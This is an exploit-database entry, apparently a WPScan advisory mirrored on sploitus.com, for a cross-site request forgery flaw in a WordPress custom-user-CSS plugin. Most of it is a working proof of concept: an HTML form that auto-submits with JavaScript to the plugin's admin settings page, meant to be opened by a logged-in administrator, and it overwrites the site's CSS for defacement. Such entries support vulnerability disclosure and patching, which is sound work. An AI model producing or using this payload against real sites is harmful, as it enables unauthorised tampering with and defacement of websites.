Share
## https://sploitus.com/exploit?id=WPEX-ID:4098B18D-6FF3-462C-AF05-48ADB6599CF3
Create an HTML form with the following content and make a logged in admin open it

<form action="https://example.com/wp-admin/themes.php?page=custom-user-css/custom_user_css.php" method="POST">
    <input type="text" name="custom_user_css_css" value="overwritten css, for example for defacement">
    <input type="text" name="action" value="update">
    <input type="text" name="page_options" value="custom_user_css_css">
</form>
<script>
    document.forms[0].submit();
</script>